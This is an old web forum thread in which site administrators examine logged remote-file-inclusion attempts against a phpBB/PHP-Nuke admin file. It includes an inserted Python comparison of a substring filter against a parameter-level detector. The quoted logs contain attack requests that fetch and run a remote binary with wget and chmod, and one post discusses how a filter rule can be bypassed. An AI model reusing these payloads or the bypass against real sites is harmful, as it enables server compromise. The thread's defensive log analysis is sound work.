fkelly
Former Moderator in Good Standing
Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY
Posted: Fri Dec 16, 2005 8:45 am
Just reading my logs this morning and came across the following that sure looks like a hack to me:
Quote:
201.9.103.71 - - [16/Dec/2005:05:21:34 -0800] "GET /v-web/portal/cms//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.phantasmairc.hpgvip.ig.com.br/CMD.txt?&cmd=help
Running Nuke 7.6, patched to 3.1 with Sentinel 2.4.2. Interesting that Sentinel didn't object to this, though this IP only occurred once in my logs so he tried this and went away. Almost looks like an XSS attack? but I'm no expert on this stuff. The IP is from Brazil and it's banned on my site now.
Back to reading my logs ...
hitwalker
Sells PC To Pay For Divorce
Posts: 5661
Posted: Fri Dec 16, 2005 8:58 am
Yes it is, it's the same useless script that kiddies use...
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
Posted: Fri Dec 16, 2005 1:33 pm
fkelly, just curious as to why you would expect NS to catch this?
fkelly
Posted: Fri Dec 16, 2005 3:07 pm
Raven: I didn't analyze it in any depth at the time but I recently posted on the filters that were screening out some Gallery commands (no responses btw) and I recalled some lines of code from NS like:
Code:
// NukeSentinel query-string filter as recalled in the thread (PHP; stristr is a case-insensitive substring test).
// The first clause only fires when "cmd=" is present AND "&cmd" is absent anywhere in the query string.
// In PHP, AND binds tighter than OR, so the trailing "../" exclusion applies only to the "concat" clause.
if ((stristr($nsnst_const['query_string'], "cmd=") AND !stristr($nsnst_const['query_string'], "&cmd")) OR
(stristr($nsnst_const['query_string'], "exec") AND !stristr($nsnst_const['query_string'], "execu")) OR
stristr($nsnst_const['query_string'],"concat") AND
!stristr($nsnst_const['query_string'], "../")) {
block_ip($blocker_row);
}
so I was thinking that if the string "cmd" was somewhere in the query string (a GET) that the filters in NS would catch it and ban the IP. Looking more closely at it, there is also a "&cmd" in the string which I suppose would negate the condition and let the query string pass thru. Which raises in my mind the question I brought up in the original post, couldn't a hacker stick the string "&cmd" somewhere in the query string and bypass the edit because of it and still do some damage? I don't pretend to really have an in-depth understanding of how these hacks work but I'm trying to learn.
My post on Gallery and the filters is at:
so I won't repeat any more of it here.
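To make the bypass concrete from the defender's side, here is an added Python example (it is not NukeSentinel code and not posted by anyone in this thread). It transcribes the substring rule quoted above, then contrasts it with a check that parses the query string into parameters and flags an include-path parameter whose value is a remote URL, or a cmd parameter in any position. The log lines are constructed after the entry fkelly quoted (the first keeps that entry's hostname; status and size fields, the other two lines, and the function names are my assumptions).

```python
"""Substring rule vs. parameter-level check for the remote-include pattern in the thread.

Added example; not NukeSentinel or PHP-Nuke code. Sample log lines are
constructed after the thread's entries (Apache common log format).
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log lines.
SAMPLE_LOG = [
    # Modelled on fkelly's entry: include path points at a remote URL, and cmd= is NOT the first parameter.
    '201.9.103.71 - - [16/Dec/2005:05:21:34 -0800] "GET /v-web/portal/cms//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.phantasmairc.hpgvip.ig.com.br/CMD.txt?&cmd=help HTTP/1.1" 404 312',
    # Constructed: same parameters with cmd= placed first, which the substring rule does catch.
    '192.0.2.10 - - [16/Dec/2005:05:30:00 -0800] "GET /modules/Forums/admin/admin_styles.php?cmd=help&phpbb_root_path=http://192.0.2.20/c.txt HTTP/1.1" 404 312',
    # Constructed: an ordinary forum page view that must not be flagged.
    '198.51.100.7 - - [16/Dec/2005:06:00:12 -0800] "GET /modules.php?name=Forums&file=viewtopic&t=1234&start=15 HTTP/1.1" 200 18233',
]

# Minimal common-log-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def substring_rule(query_string: str) -> bool:
    """The NukeSentinel substring test as quoted in the thread, transcribed to Python.

    PHP's AND binds tighter than OR, so the "../" exclusion belongs to the
    "concat" clause only.  The cmd= clause is disabled by any "&cmd", which is
    exactly the bypass fkelly asks about.
    """
    qs = query_string.lower()
    return (
        ("cmd=" in qs and "&cmd" not in qs)
        or ("exec" in qs and "execu" not in qs)
        or ("concat" in qs and "../" not in qs)
    )


def include_indicators(target: str) -> list:
    """Parse the request target into parameters and report remote-include indicators.

    Working on parsed parameters rather than raw substrings means the order
    of parameters, or an extra "&cmd", does not change the verdict.
    """
    query = urlsplit(target).query
    reasons = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if re.match(r"(https?|ftp)://", value, re.IGNORECASE):
            reasons.append(f"{name} is set to a remote URL")
        if name.lower() == "cmd":
            reasons.append("cmd parameter present")
    return reasons


def analyze(lines):
    """Run both checks over log lines; returns one finding dict per parsable line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        findings.append({
            "ip": m.group("ip"),
            "path": urlsplit(target).path,
            "substring_rule": substring_rule(urlsplit(target).query),
            "indicators": include_indicators(target),
        })
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Run as-is, the first (fkelly-style) line comes back with `substring_rule` False but two indicators, the second line is caught by both, and the benign page view by neither. The lesson for a filter author is to match on parsed parameter names and values (an include-path parameter should never carry a URL) rather than on the raw query string; the lesson for the site owner is the one Chatserv gives later in the thread, which is to remove or patch the vulnerable file so that no filter has to be right.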
Raven
Posted: Fri Dec 16, 2005 3:24 pm
Try it on your own site and see what happens. Did you get any strange messages?
fkelly
Posted: Fri Dec 16, 2005 3:52 pm
The Socratic method? LOL but you have a point, I had to dig into the logs again and try some things ...
What I get is a 404 error ... the requested resource cannot be found. Now in the original so-called exploit there is a double slash "//" between "cms" and "modules" in the path and even when I eliminate that I still get a 404 error.
Granting that hitwalker is right and it is some useless kiddie script, the issues raised in my original post still remain. Not that they couldn't be similarly disposed of but ...
Stray_Bullet
New Member
Joined: Nov 13, 2004
Posts: 17
Posted: Mon Dec 19, 2005 4:42 pm
I had the same problem...
Here's an email I sent to Chatserv...
Subject: just a question...
Thanks for the reply Chatserv!
Here's what I saw in the logs...
Code:
[17/Dec/2005:05:18:40 -0500] - - 195.82.6.3 "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" "-" 302 498 0
[17/Dec/2005:05:18:41 -0500] - - 195.82.6.3 "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" "-" 302 498 0
Another IP...
Code:
[17/Dec/2005:09:14:57 -0500] - - 81.186.243.2 "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" "-" 302 498 0
[17/Dec/2005:09:14:58 -0500] - - 81.186.243.2 "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" "-" 302 498 0
Like I said it did not get anywhere but redirected back to the IP that sent it, but I thought I saw something about "/modules/Forums/admin/admin_styles.php"!
Thanks again!
--
Stray_Bullet
His reply was...
If you have modules/Forums/admin/admin_styles.php in the server get rid of
it.
He said php-nuke does not use it or something of that sort...
Look here...
Raven
Posted: Mon Dec 19, 2005 5:13 pm
That's an exploit from phpbb v2.0.12 I believe